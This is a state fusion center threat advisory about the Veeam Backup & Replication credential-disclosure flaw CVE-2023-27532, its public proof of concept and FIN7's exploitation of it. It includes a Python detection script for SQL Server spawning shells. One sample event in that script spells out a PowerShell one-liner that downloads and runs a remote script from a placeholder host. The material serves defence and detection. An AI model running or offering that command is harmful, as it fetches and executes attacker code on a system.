[ An exploit for the vulnerability in Veeam that was alerted on 3/9 has now been developed and published. Please ensure all vulnerable Veeam instances are remediated IMMEDIATELY; I see some in Tenable that may still have the vulnerability – Robert ]
TLP: CLEAR
Recipients can spread this to the world, there is no limit on disclosure. Sources may use TLP:CLEAR when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:CLEAR information may be shared without restriction.
https://www.first.org/tlp/
Summary: Cybersecurity firm Horizon3's Attack Team (@Horizon3Attack) published a write-up and proof-of-concept (POC) exploit for CVE-2023-27532 (weblink below), a high-severity vulnerability in Veeam Backup & Replication that allows an unauthenticated user to request the encrypted credentials stored in its configuration database. Veeam Backup & Replication, developed by Veeam Software, provides backup, restore, and replication capabilities for virtual machines (VMs), physical servers, and cloud-based workloads. Reportedly, the bug lies in the Veeam backup service (which listens on port 9401 by default) and allows the host credentials to be retrieved in cleartext by abusing how the service parses GUIDs prefixed with $. An attacker can use these credentials to gain access to the backup infrastructure hosts.
According to Horizon3 Attack Team, Veeam's backup service uses the Windows Communication Foundation (WCF) framework for communication. To invoke the Veeam backup service successfully, the POC creates a WCF-compatible client that disables certificate validation and presents a DNSIdentity matching the target server. Once connected to the service, the client invokes the CredentialsDbScopeGetAllCreds method and the CredentialsDbScopeFindCredentials endpoint to obtain a binary blob from the Veeam database that contains credential information. The POC uses a custom serializer to extract usernames and passwords from the binary blob and prints the extracted credentials to the command line.
Veeam released patched builds of Veeam Backup & Replication versions 12 and 11a (weblink below) to fix the vulnerability.
Horizon3 Report: hxxps://www.horizon3[.]ai/veeam-backup-and-replication-cve-2023-27532-deep-dive/
Veeam Blog: hxxps://www.veeam[.]com/kb4424
NYSIC CAU Analyst Note: The activity has been attributed to the financially motivated cybercrime group FIN7 with high confidence. The malicious actors used the Microsoft SQL Server executable to execute a shell command on targeted systems, which performed in-memory download and execution of a PowerShell script. The script was the obfuscated POWERTRASH loader, which contains an embedded DICELOADER payload executed through reflective PE injection. The DICELOADER backdoor was used to gain a foothold on compromised machines and conduct post-exploitation procedures. FIN7 also used a custom PowerShell script, tracked as POWERHOLD, to create a persistence mechanism that executes DICELOADER on device startup. A .NET loader, dubbed DUBLOADER, was sideloaded in order to execute an on-disk payload. Numerous PowerShell scripts were also used for credential theft, lateral movement, and information gathering.
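As an added illustration of the detection angle on the analyst note above, not code from this advisory or from any of the cited sources, the following Python flags process-creation events in which the SQL Server service process (sqlservr.exe) spawns a command shell, and raises the severity when the command line carries markers of an in-memory download-and-execute one-liner. The sample events and their field names are constructed for the example.

```python
"""Flag process-creation events where sqlservr.exe spawns a command shell."""
import re
from typing import Dict, List, Optional

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# Markers commonly seen in download-and-execute PowerShell one-liners.
CRADLE_MARKERS = re.compile(
    r"(?i)(downloadstring|downloadfile|invoke-expression|\biex\b|"
    r"-enc(odedcommand)?\b|frombase64string|-nop\b|hidden)")


def _basename(path: str) -> str:
    """Return the lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify_event(event: Dict[str, str]) -> Optional[str]:
    """Return None for benign events, otherwise a severity label."""
    parent = _basename(event.get("parent_image", ""))
    child = _basename(event.get("image", ""))
    if parent != "sqlservr.exe" or child not in SHELLS:
        return None
    # A shell under the database engine is suspicious on its own; a download
    # cradle in its command line matches the in-memory loader step described.
    if CRADLE_MARKERS.search(event.get("command_line", "")):
        return "high"
    return "medium"


def detect(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Run classify_event over a batch and return the alerts it produces."""
    alerts = []
    for ev in events:
        severity = classify_event(ev)
        if severity:
            alerts.append({"host": ev.get("host", "?"), "severity": severity,
                           "command_line": ev.get("command_line", "")})
    return alerts


# Constructed sample events (not real telemetry): field names are assumed.
SAMPLE_EVENTS = [
    {"host": "bkp01", "parent_image": r"C:\SQL\MSSQL\Binn\sqlservr.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd.exe /c powershell -nop -w hidden -c \"IEX (New-Object "
                     "Net.WebClient).DownloadString('http://example.invalid/p.ps1')\""},
    {"host": "bkp01", "parent_image": r"C:\Windows\System32\services.exe",
     "image": r"C:\SQL\MSSQL\Binn\sqlservr.exe", "command_line": "sqlservr.exe -sMSSQLSERVER"},
    {"host": "bkp02", "parent_image": r"C:\SQL\MSSQL\Binn\sqlservr.exe",
     "image": r"C:\Windows\System32\cmd.exe", "command_line": "cmd.exe /c whoami"},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```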
Sources:
hxxps://www.securityweek[.]com/fin7-hackers-caught-exploiting-recent-veeam-vulnerability/
hxxps://www.computerweekly[.]com/news/365535586/Ransomware-gang-exploiting-unpatched-Veeam-backup-products
hxxps://www.helpnetsecurity[.]com/2023/03/10/cve-2023-27532/
This information has been disseminated to:
NYSIC CAU Contacts – OCT-CIP
NYSIC CAU Contacts – ITS EISO
NYSIC CAU Contacts – Cyber Partners Working Group (CPWG)
NYSIC CAU Contacts – Critical Infrastructure: All
NYSIC CAU Contacts – SLTT
NYSIC CAU Contacts – Private Sector
For more information, please contact the NYSIC Cyber Analysis Unit at (518) 786-2191 or CAU@nysic.ny.gov.